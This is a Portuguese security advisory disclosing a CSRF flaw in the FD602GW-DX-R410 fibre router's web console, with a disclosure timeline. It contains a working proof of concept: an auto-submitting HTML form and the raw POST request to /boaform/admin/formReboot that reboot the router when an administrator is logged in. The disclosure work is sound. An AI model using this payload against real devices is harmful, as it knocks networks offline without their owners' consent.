
Vulnerabilidade de CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reiniciem o dispositivo por meio de uma requisição POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.
Prova de Conceito e Aviso de Segurança para uma vulnerabilidade de Cross-Site Request Forgery (CSRF) na interface administrativa do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O aviso descreve o impacto, o vetor de ataque e as recomendações para remediação.
A vulnerabilidade CSRF no roteador FD602GW-DX-R410 permite que atacantes remotos reinicializem o dispositivo por meio de uma solicitação POST maliciosa para /boaform/admin/formReboot quando um administrador está autenticado.
Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi descoberta no console administrativo baseado na web do roteador de fibra FD602GW-DX-R410 (Firmware V2.2.14). O endpoint /boaform/admin/formReboot permite que solicitações POST acionem uma reinicialização completa do dispositivo sem tokens CSRF ou validação de origem. Se um administrador autenticado visitar uma página maliciosa, o roteador pode ser reinicializado remotamente sem consentimento.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK; O roteador reinicia imediatamente.
| Data | Ação |
|---|---|
| Jun 2025 | Vulnerabilidade descoberta |
| Jun 2025 | Tentativa de divulgação responsável (sem resposta) |
Este aviso é fornecido para fins educacionais e de conscientização sobre segurança. O autor não se responsabiliza pelo uso indevido. Todos os testes foram realizados em um ambiente controlado.
| Jul 2025 | ID do CVE solicitado à MITRE |
| Jul 2025 | Aviso preparado e aguardando publicação |
| Sep 2025 | CVE atribuído, aviso tornado público |